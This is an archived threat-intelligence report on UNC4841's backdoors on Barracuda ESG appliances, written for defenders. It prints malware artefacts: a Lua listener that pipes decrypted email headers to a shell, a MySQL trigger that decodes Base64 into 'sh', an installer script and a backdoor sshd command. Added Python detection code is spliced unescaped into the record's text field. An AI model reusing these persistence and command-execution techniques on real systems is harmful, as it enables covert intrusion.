{
	"id": "643a6b33-5e52-49a2-85e9-dd35140718ea",
	"created_at": "2026-04-06T00:13:37.291108Z",
	"updated_at": "2026-04-10T03:30:25.660407Z",
	"deleted_at": null,
	"sha1_hash": "03f2b901f28993757ec9aaefff97e443035b7190",
	"title": "Diving Deep into UNC4841 Operations Following Barracuda ESG Zero-Day Remediation (CVE-2023-2868) | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2283204,
	"plain_text": "Diving Deep into UNC4841 Operations Following Barracuda ESG Zero-Day Remediation (CVE-2023-2868) | Mandiant\r\nBy Mandiant\r\nPublished: 2023-08-29 · Archived: 2026-04-02 12:45:42 UTC\r\nWritten by: Austin Larsen, John Palmisano, John Wolfram, Mathew Potaczek, Michael Raggi\r\nUPDATE (Aug. 21, 2024): This post has been updated to remove four indicators of compromise (IOC) in the Domains\r\nsection. Based on further research, we have determined that there was insufficent evidence to confirm if these IOCs were\r\nrelated to this campaign.\r\nOn June 15, 2023, Mandiant released a blog post detailing an 8-month-long global espionage campaign conducted by a\r\nChinese-nexus threat group tracked as UNC4841. In this follow-up blog post, we will detail additional tactics, techniques,\r\nand procedures (TTPs) employed by UNC4841 that have since been uncovered through Mandiant’s incident response\r\nengagements, as well as through collaborative efforts with Barracuda Networks and our International Government partners.\r\nOver the course of this blog post, Mandiant will detail how UNC4841 has continued to show sophistication and adaptability\r\nin response to remediation efforts. Specifically, UNC4841 deployed new and novel malware designed to maintain presence\r\nat a small subset of high priority targets that it compromised either before the patch was released, or shortly following\r\nBarracuda’s remediation guidance. 
We’ll also showcase how UNC4841’s deployment of select backdoors suggests that this threat\r\nactor anticipated and prepared for remediation efforts by creating tooling in advance to remain embedded in high-value\r\ntargets, should the campaign be compromised.\r\nFurthermore, Mandiant will provide additional insights into the overall campaign timeline as well as a deeper look into\r\nUNC4841’s targeting, as observed through investigations at downstream customers, further strengthening the case for ties\r\nbetween UNC4841 and the People’s Republic of China.\r\nSince Barracuda released a patch to ESG appliances on May 20, 2023, Mandiant and Barracuda have not identified evidence\r\nof successful exploitation of CVE-2023-2868 resulting in any newly compromised physical or virtual ESG appliances. Only\r\na limited number of ESG appliances worldwide were compromised (5% of ESG appliances), and impacted customers have\r\nbeen notified to replace the appliances. No other Barracuda product, including Barracuda’s SaaS email solutions, was\r\nimpacted by this vulnerability.\r\nMandiant and Barracuda investigations into previously compromised appliances confirmed UNC4841 deployed additional\r\nmalware to a subset of devices and conducted additional post-exploitation activities.\r\nMandiant assesses that, at the time of writing, a limited number of previously impacted victims remain at risk due to this\r\ncampaign. UNC4841 has shown an interest in a subset of priority victims - it is on these victims’ appliances that additional\r\nmalware, such as the backdoor DEPTHCHARGE, was deployed to maintain persistence in response to remediation efforts.\r\nMandiant and Barracuda have reached out to individual victims where such activity has been identified. 
Mandiant’s\r\nrecommendations remain unchanged — victims impacted by this campaign should contact Barracuda support and replace\r\nthe compromised appliance.\r\nCampaign Timeline\r\nSince our initial blog post, Mandiant has assembled and analyzed an exhaustive timeline of all identified UNC4841 activity\r\nobserved at victims impacted by the successful exploitation of CVE-2023-2868. As depicted in Figure 1, the campaign\r\nspanned the timeframe between October 2022 and June 2023, with an initial surge of CVE-2023-2868 exploitation activity\r\noccurring in early November 2022.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation\r\nPage 1 of 23\n\nFigure 1: Identified UNC4841 activity (blue) and victims (red) over the duration of the campaign\r\nThrough our analysis of the campaign, Mandiant identified a distinct fall off in activity from approximately January 20 to\r\nJanuary 22, 2023, a period that coincides with the beginning of the Chinese New Year — a national holiday observed within\r\nthe People’s Republic of China. Additionally, further analysis of the timeline identified two surges in activity that followed\r\nBarracuda’s initial remediation efforts and public notification on May 23, 2023. The first surge occurred in the days\r\nimmediately following the notification, where the actor retooled malware and changed persistence methods as detailed in\r\nour previous blog. This was followed by a second, previously undisclosed wave, that began in early June 2023. In this\r\nsecond wave, Mandiant discovered the actor attempting to maintain access to compromised environments via the\r\ndeployment of the new malware families SKIPJACK, DEPTHCHARGE, and FOXTROT / FOXGLOVE. 
This second surge\r\nrepresented the highest intensity of UNC4841 activity identified by Mandiant across the entire campaign, demonstrating\r\nUNC4841’s determination to preserve access to specific victim environments.\r\nTargeted Tooling\r\nUNC4841 is a well-resourced actor that has utilized a wide range of malware and purpose-built tooling to enable their global\r\nespionage operations. One theme that has become apparent as our investigation has progressed is the selective deployment\r\nof specific malware families at high priority targets. The three code families we have observed being selectively deployed\r\nare SKIPJACK, DEPTHCHARGE, and FOXTROT / FOXGLOVE. Each of these malware families represents a level of\r\nincreasing selectivity in its deployment.\r\nSKIPJACK\r\nSKIPJACK is a passive backdoor implemented by trojanizing legitimate Barracuda ESG modules by injecting malicious\r\nLua code. Through the injected code, SKIPJACK establishes its backdoor capabilities by registering a listener for specific\r\nincoming email headers and subjects, and then decoding and executing their content. Mandiant has observed\r\nvariations of SKIPJACK that utilize both the Content-ID and X-Barracuda-Spam-Info email header fields, an example of\r\nwhich can be seen in the following code snippet.\r\nif hdr:name() == \"Content-ID\" then\r\n  if hdr:body() ~= nil then\r\n    if string.match(hdr:body(), \"^[%w%+/=\\r\\n]+$\") then\r\n      io.popen(\"echo \\\"\" .. hdr:body() .. \"\\\" | openssl aes-256-cbc -d -A -a -nosalt -K \u003cREDACTED\u003e -iv \u003cR\r\n    end\r\n  end\r\nend\r\nFigure 2: SKIPJACK Listener\r\nAs observed in the code snippet, the injected SKIPJACK code inspects whether the Content-ID header exists, and that it\r\ncontains only characters that would be present in a Base64 encoded string (the Lua character class %w%+/= plus CR and LF,\r\nwhich allows for header folding). 
When the condition is met, it proceeds to AES-256\r\ndecrypt and Base64 decode the header body, and then pipes the output to a system shell for execution. Because the trigger\r\nis an inbound email header, the operator needs nothing more than the ability to deliver a message through the appliance\r\nto reach that shell.\r\nAround the time of Barracuda's initial notification regarding CVE-2023-2868, Mandiant observed UNC4841 creating bash\r\nscripts on previously compromised appliances with the filename `mknod` in the path `/boot/os_tools/`. The `mknod` bash\r\nscript checks whether the `mod_content.lua` script on the compromised appliance contains the string `OpenSSL`, and if not\r\nfound, injects the code snippet in Figure 2 into the mod_content.lua script, effectively backdooring the legitimate Barracuda\r\nESG module.\r\nOf these three malware families, UNC4841 most widely deployed SKIPJACK, which was observed on roughly 5.8 percent\r\nof all compromised ESG appliances. UNC4841 primarily targeted government and technology organizations with\r\nSKIPJACK; however, multiple other verticals were observed being targeted.\r\nFigure 3: SKIPJACK sector distribution\r\nAdditionally, of all the malware families deployed by UNC4841 in this campaign, Mandiant found that SKIPJACK had the\r\nmost variants. Although we identified evidence of many different SKIPJACK bash scripts existing on compromised\r\nappliances, we were not able to recover all instances of the malware. Based on the samples we did obtain, we suspect that\r\neach of these unrecovered variants contained different SKIPJACK code that utilized different sections within an email\r\nmessage to hide its encrypted command and achieve the same functionality.\r\nDEPTHCHARGE\r\nAnother malware family Mandiant observed being selectively deployed by UNC4841 was a passive backdoor we named\r\nDEPTHCHARGE. 
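Before the DEPTHCHARGE discussion, the following Python is an added hunting example; it is not code from the original post or from Barracuda. It inverts the injected listener's own condition to find messages whose Content-ID or X-Barracuda-Spam-Info header carries a Base64 blob instead of a normal value, and adds a file-level check for a trojanized mod_content.lua. The header names and the listener condition come from Figure 2; the sample messages, the single-quoted Lua sample, the KEY/IV placeholders and the 'must decode cleanly' tightening are assumptions made here.

```python
import base64
import email
import re

# Header fields the report saw carrying SKIPJACK commands. The injected Lua
# only acts when the header body consists solely of Base64-alphabet characters.
SKIPJACK_HEADERS = ('Content-ID', 'X-Barracuda-Spam-Info')
B64_CHARSET = re.compile('^[A-Za-z0-9+/=]+$')
CR, LF = chr(13), chr(10)


def is_skipjack_trigger(name, value):
    '''Mirror the listener condition from Figure 2: a watched header is present
    and its body, with CR/LF folding removed (the Lua class allows them), is
    pure Base64. Tightening assumed here: the body must also decode cleanly,
    since a blob openssl cannot decode produces nothing for the shell to run.'''
    if name not in SKIPJACK_HEADERS:
        return False
    body = value.replace(CR, '').replace(LF, '')
    if not body or not B64_CHARSET.match(body):
        return False
    try:
        base64.b64decode(body, validate=True)
    except ValueError:  # binascii.Error is a ValueError
        return False
    return True


def scan_message(raw):
    '''Return the (header, value) pairs of a raw RFC 5322 message that would
    fire the listener. A genuine Content-ID looks like <id@host>; the angle
    brackets and @ are outside the Base64 alphabet, so it never matches.'''
    msg = email.message_from_string(raw)
    return [(n, v) for n, v in msg.items() if is_skipjack_trigger(n, v)]


def lua_module_looks_trojanized(lua_source):
    '''File-level hunt for the injection: a clean ESG Lua module has no reason
    to hand header bodies to openssl through io.popen. (The actor's own mknod
    script tested mod_content.lua for the string OpenSSL before injecting.)'''
    s = lua_source.lower()
    return 'io.popen' in s and 'openssl' in s and 'hdr:body()' in s


# Constructed samples, not material from the report. The blob is encoded
# filler, not a real SKIPJACK command.
FAKE_BLOB = base64.b64encode(b'placeholder: not a real encrypted command').decode()

BENIGN_MSG = '''From: a@example.test
To: b@example.test
Subject: status
Content-ID: <part1.20230601@mail.example.test>
X-Barracuda-Spam-Info: Score=0.00 tag=-

hello
'''

SUSPECT_MSG = BENIGN_MSG.replace('<part1.20230601@mail.example.test>', FAKE_BLOB)

# Shape of the injected listener, written with single-quoted Lua strings so
# the sample stays self-contained; KEY and IV stand in for the redacted values.
SAMPLE_INJECTED_LUA = '''if hdr:name() == 'Content-ID' then
  if hdr:body() ~= nil then
    io.popen('echo ' .. hdr:body() .. ' | openssl aes-256-cbc -d -A -a -nosalt -K KEY -iv IV | sh')
  end
end'''

if __name__ == '__main__':
    print('benign  :', scan_message(BENIGN_MSG))
    print('suspect :', scan_message(SUSPECT_MSG))
    print('lua hit :', lua_module_looks_trojanized(SAMPLE_INJECTED_LUA))
```

Run scan_message over messages exported from the appliance's message store or over header values recorded in mail logs. False positives come mainly from unusual vendor headers whose values happen to be valid Base64; a genuine Content-ID never qualifies because of its angle brackets and @ sign.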
DEPTHCHARGE, which is tracked by CISA as SUBMARINE, is packaged as a Linux shared object\r\nlibrary, which is pre-loaded into the Barracuda SMTP (BSMTP) daemon using LD_PRELOAD. DEPTHCHARGE listens\r\npassively to receive encrypted commands, which it decrypts with OpenSSL and executes before sending the results,\r\nmasqueraded as SMTP commands, back to the command and control (C2) server. DEPTHCHARGE is installed and\r\npersisted through a complex execution chain, which the actor crafted to enable infection of re-issued or clean appliances\r\nwhen the victim restored backup configurations from a previously compromised device. Figure 4 provides a depiction of the\r\nDEPTHCHARGE execution chain.\r\nFigure 4: DEPTHCHARGE execution chain\r\nThe first stage of the DEPTHCHARGE execution chain existed in a file named `config.TRG`, which defines a malicious\r\ntrigger (named `cuda` or `cuda_trigger`) in the MySQL database that stores the configuration for the Barracuda ESG\r\nappliance.\r\nTYPE=TRIGGERS\r\ntriggers='CREATE TRIGGER cuda\\nBEFORE DELETE ON config\\nFOR EACH ROW\\nBEGIN\\n DECLARE i INT;\\n SET i = 1;\\n IF i\r\n-n Y2F0IC92YXIvdG1wL3IgfCBiYXNlNjQgLWQgLWkgfCB0YXIgLXp4IC1DIC92YXIvdG1wCm5vaHVwIGJhc2ggL3Zhci90bXAvcnVuLnNoICAgMzExNTMgICAgPi9kZXYvbnVsbCAyPiYxICYKcm0gLWYgL3Jvb3QvbWFjaGluZVxgKg== | base64 -d | sh\"\r\nsql_modes=0\r\ndefiners='root@localhost'\r\nFigure 5: DEPTHCHARGE trigger\r\ncat /var/tmp/r | base64 -d -i | tar -zx -C /var/tmp\r\nnohup bash /var/tmp/run.sh 31153 \u003e/dev/null 2\u003e\u00261 \u0026\r\nrm -f /root/machine\\`*\r\nFigure 6: DEPTHCHARGE decoded installer script (the Base64 blob in Figure 5 decodes to these three lines)\r\nThe trigger is executed before a row is removed from the configuration database, an action which occurs frequently and at\r\nthe time of restoration of a previous Barracuda ESG configuration. 
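Because the trigger travels inside an exported configuration, the most useful pre-restore check is to enumerate the triggers it contains. The following Python is an added example, not the report's or Barracuda's tooling: it lists every trigger in .TRG-style or dumped configuration text, decodes any Base64 blob the trigger body pipes into base64 -d, and flags filenames shaped to abuse Perl's two-argument open(). The Base64 payload in the sample is the one printed in Figure 5 (so it decodes to Figure 6); the trigger body around it, the file names and the regular expressions are assumptions made here.

```python
import base64
import re

# Trigger definition as MySQL stores it in a .TRG file or a configuration
# dump. Any trigger on the ESG configuration table deserves a look; the one
# in the report was named cuda or cuda_trigger and ran BEFORE DELETE ON config.
TRIGGER_RE = re.compile(
    'CREATE TRIGGER[^A-Za-z0-9_]+([A-Za-z0-9_]+)[^A-Za-z]+(BEFORE|AFTER)[^A-Za-z]+'
    '(INSERT|UPDATE|DELETE)[^A-Za-z]+ON[^A-Za-z0-9_]+([A-Za-z0-9_]+)',
    re.IGNORECASE)
# A Base64 blob that the trigger body pipes into base64 -d (and on to sh).
B64_TO_SHELL_RE = re.compile('([A-Za-z0-9+/]{20,}={0,2})[ ]*[|][ ]*base64[ ]+-d')


def find_trigger_payloads(text):
    '''Return one dict per trigger found in the text: name, timing, event,
    table, and every decoded Base64 blob the trigger body hands to base64 -d.
    Run this on an exported configuration before restoring it anywhere.'''
    results = []
    matches = list(TRIGGER_RE.finditer(text))
    for i, m in enumerate(matches):
        end = matches[i + 1].start() if i + 1 < len(matches) else len(text)
        body = text[m.end():end]
        payloads = []
        for blob in B64_TO_SHELL_RE.findall(body):
            try:
                payloads.append(base64.b64decode(blob).decode('utf-8', 'replace'))
            except ValueError:
                payloads.append('(undecodable blob starting ' + blob[:12] + ')')
        results.append({'name': m.group(1), 'timing': m.group(2).upper(),
                        'event': m.group(3).upper(), 'table': m.group(4),
                        'payloads': payloads})
    return results


def filename_abuses_perl_open(name):
    '''The report states the installer was launched by a crafted filename that
    ESG code later passed to Perl's two-argument open(), which runs the name
    as a command when it begins or ends with a pipe; backticks inside the name
    expand once it reaches a shell. Flag either pattern in a directory listing.'''
    n = name.strip()
    return chr(96) in n or n.startswith('|') or n.endswith('|')


# Constructed sample in .TRG layout (not the report's file). The Base64 blob is
# the one printed in Figure 5 and decodes to the installer in Figure 6; the
# trigger body around it is assumed, since the report only shows a fragment.
BLOB = ('Y2F0IC92YXIvdG1wL3IgfCBiYXNlNjQgLWQgLWkgfCB0YXIgLXp4IC1DIC92YXIvdG1wCm5v'
        'aHVwIGJhc2ggL3Zhci90bXAvcnVuLnNoICAgMzExNTMgICAgPi9kZXYvbnVsbCAyPiYxICYK'
        'cm0gLWYgL3Jvb3QvbWFjaGluZVxgKg==')
SAMPLE_TRG = ('''TYPE=TRIGGERS
triggers='CREATE TRIGGER cuda
BEFORE DELETE ON config
FOR EACH ROW
BEGIN
 DECLARE i INT;
 SET i = 1;
 IF i = 1 THEN
  (assumed body) echo -n ''' + BLOB + ''' | base64 -d | sh
 END IF;
END'
sql_modes=0
definers='root@localhost'
''')

if __name__ == '__main__':
    for trig in find_trigger_payloads(SAMPLE_TRG):
        print(trig['name'], trig['timing'], trig['event'], 'ON', trig['table'])
        for p in trig['payloads']:
            print('  decoded payload:', repr(p))
    print(filename_abuses_perl_open('machine' + chr(96) + 'id' + chr(96)))
```

A clean export is expected to define no triggers at all on the configuration table, so any hit is worth a manual read of the trigger body, not just of the decoded blob; the decoder exists to save the analyst a step, not to decide the question.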
The first part of the trigger writes a Base64 payload to\r\n`/var/tmp/r`; a TAR archive that contains an installer shell script and the final DEPTHCHARGE backdoor payload. The\r\nremaining components of the trigger write a script to disk that decompresses this archive, runs the installer script inside it, and\r\nthen removes the file from disk. However, it is not possible to execute a script directly from the MySQL trigger. Therefore, in\r\norder to execute the installer script, UNC4841 specially crafted a filename that would cause other components of the\r\nBarracuda ESG’s codebase that used the two-argument form of Perl’s open() function to execute commands (shown inside\r\nthe backticks). Ultimately, this novel approach enabled UNC4841 to achieve command execution from the MySQL trigger\r\nand launch the DEPTHCHARGE script. The fact that UNC4841 identified and operationalized this complex execution path\r\nsuggests that they had extensive knowledge of the device and had researched internal components of the Barracuda ESG\r\nappliance.\r\nThe installer script `run.sh` is executed with an argument that specifies the DEPTHCHARGE `BSMTP_ID` configuration\r\nvalue (discussed as follows). The script is responsible for moving the DEPTHCHARGE payload to a legitimate directory on\r\nthe appliance, and modifying the SMTP configuration file to pre-load the malware with the given BSMTP_ID configuration\r\nvalue upon execution of the BSMTP daemon. It also creates additional scripts that sleep for two minutes prior to execution,\r\ncheck if the pre-load persistence is present, and install it into the SMTP configuration file if it is not found. To further blend\r\ninto legitimate activity, some variants of the script were also found to timestomp the malware files by inheriting timestamps\r\nfrom legitimate files on the system using the `touch` command.\r\nThe DEPTHCHARGE backdoor can accept incoming TCP connections. 
It checks if the TCP source port of the client is\r\nequal to the value in the `BSMTP_ID` environment variable, and if so executes its backdoor capability as a Linux daemon.\r\nDEPTHCHARGE first connects to the appliance's SMTP port (127.0.0.1:25) to retrieve the appliance’s genuine SMTP\r\nbanner, which it sends back to the attacker. This is likely used as an SMTP greeting message and to verify the identity of the\r\nappliance to which they are connecting.\r\nThe malware is then able to receive encrypted commands that masquerade as SMTP EHLO commands, which are preceded\r\nwith the string “ehlo” followed by a space. The encrypted commands are base64 decoded and AES decrypted with OpenSSL\r\nbefore being executed. The malware sends the results back to the attacker, again masquerading them as SMTP traffic:\r\n250-mail2.eccentric.duck Hello \u003ccommand body\u003e [\u003cclient's IP address string\u003e], pleased to meet you\r\n250-SIZE 100000000\r\n250-PIPELINING\r\n250-8BITMIME\r\n250 HELP\r\nFigure 7: DEPTHCHARGE SMTP greeting\r\nThe SMTP reply sent by DEPTHCHARGE in response to an SMTP EHLO command contains the local hostname\r\n“mail2.eccentric.duck”. This hostname is a hardcoded string and does not relate to any public registered domain name.\r\nIt was common practice for impacted victims to export their configuration from compromised appliances so it could be\r\nrestored into a clean one. Therefore, if the DEPTHCHARGE trigger was present in the exported configuration, it would\r\neffectively enable UNC4841 to infect the clean device with the DEPTHCHARGE backdoor through this execution chain,\r\nand potentially maintain access even after complete replacement of the appliance. An exported configuration should\r\ntherefore be inspected for triggers before it is restored to a replacement appliance. Mandiant and Barracuda Networks\r\nidentified instances where this may have occurred and notified victims accordingly. Additionally, Mandiant is aware that in\r\nsome cases, this MySQL configuration database may contain plaintext passwords for user accounts. 
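The exchange above gives two network-side handles: the EHLO argument is a Base64 blob rather than a hostname, and the forged 250 reply carries the hard-coded hostname mail2.eccentric.duck. A third handle follows from the activation rule: the client has to connect from a TCP source port equal to BSMTP_ID, so one fixed source port keeps recurring toward tcp/25 instead of the fresh ephemeral port an ordinary client would use. The following Python is an added example (not the report's code) that applies all three to a constructed SMTP transcript and a constructed flow list; the documentation-range IP addresses, the filler EHLO blob, the length threshold and the min_count threshold are assumptions, while 31153 is the BSMTP_ID argument shown in Figure 6.

```python
import base64
import re
from collections import Counter

# Hostname hard-coded into DEPTHCHARGE's forged EHLO reply (Figure 7).
DEPTHCHARGE_HOST = 'mail2.eccentric.duck'
B64_BLOB = re.compile('^[A-Za-z0-9+/]{16,}={0,2}$')


def ehlo_argument_is_blob(arg):
    '''A real EHLO argument is a hostname or an address literal like [ip].
    The backdoor expects the literal word ehlo, a space, then Base64 of an
    AES-encrypted command: no dots, typically with + / or = padding.'''
    arg = arg.strip()
    if '.' in arg or arg.startswith('['):
        return False
    if not B64_BLOB.match(arg):
        return False
    # Assumed threshold: short dotless names (e.g. a bare NetBIOS name) are
    # common, so require length or a non-alphanumeric Base64 character.
    return len(arg) >= 24 or any(c in arg for c in '+/=')


def analyze_smtp_transcript(transcript):
    '''transcript: list of (direction, line) with direction 'C' for the client
    and 'S' for the server. Returns (reason, line) findings in order.'''
    findings = []
    for direction, line in transcript:
        if direction == 'C':
            parts = line.split(None, 1)
            if len(parts) == 2 and parts[0].lower() in ('ehlo', 'helo'):
                if ehlo_argument_is_blob(parts[1]):
                    findings.append(('ehlo-argument-is-base64-blob', line))
        elif DEPTHCHARGE_HOST in line:
            findings.append(('depthcharge-hardcoded-hostname', line))
    return findings


def fixed_source_port_clients(flows, min_count=3):
    '''flows: iterable of (src_ip, src_port, dst_port). DEPTHCHARGE activates
    only when the client's TCP source port equals its BSMTP_ID value, so the
    operator has to reuse one source port toward tcp/25. Ordinary clients take
    a fresh ephemeral port per connection, so a repeated (src_ip, src_port)
    pair toward the SMTP port stands out. min_count is an assumed threshold.'''
    counts = Counter((ip, sp) for ip, sp, dp in flows if dp == 25)
    return sorted((ip, sp, n) for (ip, sp), n in counts.items() if n >= min_count)


# Constructed samples, not captured traffic. 192.0.2.x and 198.51.100.x are
# documentation addresses; the EHLO blob is encoded filler, not a real command.
FAKE_CMD = base64.b64encode(b'placeholder: not a real encrypted command').decode()
SAMPLE_TRANSCRIPT = [
    ('S', '220 esg.example.test ESMTP'),
    ('C', 'ehlo mail.example.test'),
    ('S', '250-esg.example.test Hello mail.example.test [192.0.2.10], pleased to meet you'),
    ('C', 'ehlo ' + FAKE_CMD),
    ('S', '250-' + DEPTHCHARGE_HOST + ' Hello placeholder-output [198.51.100.7], pleased to meet you'),
    ('S', '250 HELP'),
]
# 31153 is the BSMTP_ID argument passed to run.sh in Figure 6.
SAMPLE_FLOWS = [
    ('192.0.2.10', 51022, 25), ('192.0.2.10', 51023, 25), ('192.0.2.11', 40111, 443),
    ('198.51.100.7', 31153, 25), ('198.51.100.7', 31153, 25), ('198.51.100.7', 31153, 25),
]

if __name__ == '__main__':
    for reason, line in analyze_smtp_transcript(SAMPLE_TRANSCRIPT):
        print(reason, '->', line)
    print(fixed_source_port_clients(SAMPLE_FLOWS))
```

The transcript checks need SMTP visibility (a sensor in front of the appliance or the appliance's own mail logs), whereas the fixed-source-port check works on ordinary flow records, which is why it is kept separate.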
Where such plaintext passwords were present, we\r\nsuspect the actor was harvesting these credentials for lateral movement purposes.\r\nThe earliest evidence of UNC4841 deploying DEPTHCHARGE occurred on May 30, 2023, roughly one week after\r\nBarracuda’s initial notification. Mandiant observed UNC4841 rapidly deploy DEPTHCHARGE to select targets following\r\nBarracuda’s announcement that RMA was the recommended response action. This capability and its deployment suggest\r\nthat UNC4841 anticipated and was prepared for remediation efforts with tooling and TTPs designed to enable them to\r\npersist on high value targets. It also suggests that despite this operation's global coverage, it was not opportunistic, and that\r\nUNC4841 had adequate planning and funding to anticipate and prepare for contingencies that could potentially disrupt their\r\naccess to target networks. Over the course of the investigation to date, Mandiant has identified UNC4841 deploying\r\nDEPTHCHARGE to roughly 2.64 percent of compromised appliances. These victims included U.S. and foreign government\r\nentities, as well as high tech and information technology providers.\r\nFigure 8: DEPTHCHARGE sector distribution\r\nFOXTROT / FOXGLOVE\r\nThe final malware family Mandiant observed being selectively deployed by UNC4841 was FOXTROT / FOXGLOVE.\r\nFOXGLOVE is a launcher written in C that executes the hardcoded path of FOXTROT. The payload is executed along with\r\nadditional encrypted arguments for the C2, port, secret key, and jitter. 
FOXGLOVE uses a combination of Base64, Mod(13),\r\nand XOR with a hard-coded key to obfuscate its arguments; because the key is hard-coded in the launcher, this is a\r\nreversible encoding rather than real encryption.\r\nFigure 9: FOXGLOVE encryption routine\r\nFOXGLOVE is implemented to be configurable, as the execution path and arguments can easily be changed.\r\n/usr/share/foxdoor/foxdoor_shell shell -t \u003cEncrypted C2\u003e -p \u003cEncrypted Port\u003e -s \u003cEncrypted Secret\u003e -r \u003cJitter\u003e\r\nFigure 10: FOXGLOVE execution\r\nFOXTROT is a backdoor written in C++ that communicates via TCP and is able to be used as a proxy. Supported backdoor\r\ncommands include keystroke capture, shell command execution, reverse shell creation, and file transfer.\r\nFOXTROT overlaps with the open-source REPTILE shell code. FOXTROT notably makes use of the default sequence\r\n`;7(Zu9YTsA7qQ#vw` as an acknowledgement token, and to signal session termination. FOXTROT, however, also includes\r\nbackdoor commands and functionality not present in REPTILE.\r\nFOXTROT and FOXGLOVE are also notable in that they are the only malware families observed being used by UNC4841\r\nthat were not specifically designed for Barracuda ESGs. Based on functionality, FOXTROT was likely also intended to be\r\ndeployed to other Linux-based devices within a network to enable lateral movement and credential theft. Additionally,\r\nFOXGLOVE and FOXTROT were the most selectively deployed of all the malware families used by UNC4841. 
At this\r\ntime, Mandiant has only observed UNC4841 deploy FOXTROT and FOXGLOVE at government or government related\r\norganizations that were high priority targets for the PRC.\r\nFigure 11: FOXTROT / FOXGLOVE sector distribution\r\nLateral Movement\r\nFollowing Barracuda’s public disclosure of CVE-2023-2868, Mandiant identified UNC4841 performing internal\r\nreconnaissance and subsequent lateral movement actions within a limited number of victim environments.\r\nOn May 16, 2023, Mandiant observed the first evidence of UNC4841 attempting to perform internal reconnaissance on a\r\nsmall number of victims' internal networks in which Mandiant was responding. In these cases, the actor utilized open-source\r\ntools such as fscan to perform host detection, port scanning, web fingerprint identification, web vulnerability scanning,\r\ndomain control identification, and other reconnaissance actions. In one environment, the actor scanned more than 50 subnets\r\nover the course of nine days, with approximately 80 percent of these being completed in one day. 
Figure 12 shows an\r\nexample output from the fscan tool recovered from a compromised ESG appliance.\r\n\u003credacted\u003e::25 open\r\n\u003credacted\u003e:25 open\r\n\u003credacted\u003e:587 open\r\n\u003credacted\u003e:443 open\r\n[*] NetInfo:\r\n[*]\u003credacted\u003e\r\n [-\u003e]\u003credacted\u003e\r\n [-\u003e]\u003credacted\u003e\r\n[*] WebTitle: https://\u003credacted\u003e code:200 len:701 title:IIS Windows Server\r\n\u003credacted\u003e:25 open\r\n\u003credacted\u003e:443 open\r\n[*] LiveTop \u003credacted\u003e/16 段存活数量为: 65\r\n[*] LiveTop \u003credacted\u003e/16 段存活数量为: 26\r\n[*] LiveTop \u003credacted\u003e/16 段存活数量为: 13\r\n\u003credacted\u003e:25 open\r\n\u003credacted\u003e:587 open\r\n\u003credacted\u003e:53 open\r\n\u003credacted\u003e:389 open\r\nFigure 12: fscan output recovered from a compromised ESG appliance. The three LiveTop lines are fscan's Chinese-language\r\nsummary of the number of live hosts found in each /16 (65, 26 and 13 respectively).\r\nIn addition to the reconnaissance actions, Mandiant also observed UNC4841 attempting to move laterally from impacted\r\nESG appliances within this same time period. Based on the activity observed over the course of the investigation, Mandiant\r\nbelieves UNC4841 was likely utilizing the contents of messages stored within the mstore, a temporary storage location on\r\nthe ESG, to harvest credentials. In multiple instances, Mandiant identified cleartext credentials contained within the contents\r\nof messages stored on the ESG that UNC4841 subsequently used to successfully access the account through Outlook Web\r\nAccess (OWA) on the first attempt.\r\nIn more than one case, Mandiant observed UNC4841 utilizing OWA to attempt to log in to mailboxes for users within the\r\nvictim organization. In one case, a relatively low number of unsuccessful OWA access attempts resulted in the lockout of a\r\nlimited number of accounts. In the cases where UNC4841 was able to obtain unauthorized access to a limited number of\r\naccounts, Mandiant did not observe UNC4841 send any email from the compromised account. 
Mandiant assesses that\r\nUNC4841 was likely attempting to maintain access to compromised users’ mailboxes to gather information for espionage\r\npurposes post Barracuda remediation.\r\nIn addition to attempts to move laterally to Active Directory and OWA, Mandiant also observed attempts by UNC4841 to\r\nmove laterally via SSH to VPNs, Proxy Servers, and other edge appliances on the victims’ networks.\r\nMandiant also identified accounts created by UNC4841 within the /etc/passwd file on roughly five percent of the previously\r\nimpacted appliances, as another form of remote access. Account names followed a consistent format, containing four (4)\r\nrandomly generated characters. The actor would then spawn an SSH daemon process to listen on a specific high port and allow\r\nlogin only from this newly created user account as another means to maintain backdoor access to compromised appliances. An\r\nexample of the command is shown as follows (rfvN is the four-character account):\r\n/usr/sbin/sshd -p 48645 -oAllowUsers=rfvN\r\nIn one case, Mandiant identified UNC4841 successfully accessing a Windows Server Update Services (WSUS) server\r\nutilizing a domain administrator account identified within the mstore on an ESG appliance. The access to WSUS is notable\r\nas Mandiant has observed other China-nexus espionage actors deploying malware on a WSUS server to inject fake updates\r\nfor remote code execution in efforts to steal data from government entities.\r\nTargeting\r\nIn the two months since our introduction of UNC4841, Mandiant has also come to better understand UNC4841’s targeting of\r\nESG appliances and their primary targets based on their selectivity in follow-on operations. Overall, Mandiant has observed\r\ntargeted organizations across public and private sectors worldwide appear to be impacted by UNC4841 tools. 
While the\r\nmajority of exploitation activity appears to impact the Americas, that may partially reflect the product’s customer base\r\n(Figure 13).\r\nFigure 13: Affected organizations by region\r\nOrganizations observed to be impacted by UNC4841 sit in a wide variety of verticals, with the primary targets including\r\nnational governments, high tech and information technology entities, local governments, telecommunications providers,\r\nmanufacturing entities, and colleges and universities. Twenty-six specific verticals were observed that spanned a broad\r\nspectrum of functions (Figure 14). Noteworthy sectors that were included in minority targeted segments included healthcare\r\nand biotechnology, public health, aerospace and defense, and semiconductors.\r\nFigure 14: Sector breakdown, percentage of impacted organizations\r\nAlmost a third of identified affected organizations were government agencies. As stated in Mandiant’s earlier publication,\r\nshell scripts were uncovered that targeted email domains and users from ASEAN Ministry of Foreign Affairs, as well as\r\nforeign trade offices and academic research organizations in Taiwan and Hong Kong. In addition, the actors searched for\r\nemail accounts belonging to employees of a government with political or strategic interest to the PRC while this victim\r\ngovernment was participating in high-level, diplomatic meetings with other countries. This suggests targeted exfiltration was\r\nprioritized for specific high value geopolitical and economic users. A distinct prioritization of government agencies\r\nalongside high tech and information technology targets was also observed when examining UNC4841 tools deployed\r\nfollowing Barracuda’s patching and initial disclosure of CVE-2023-2868. 
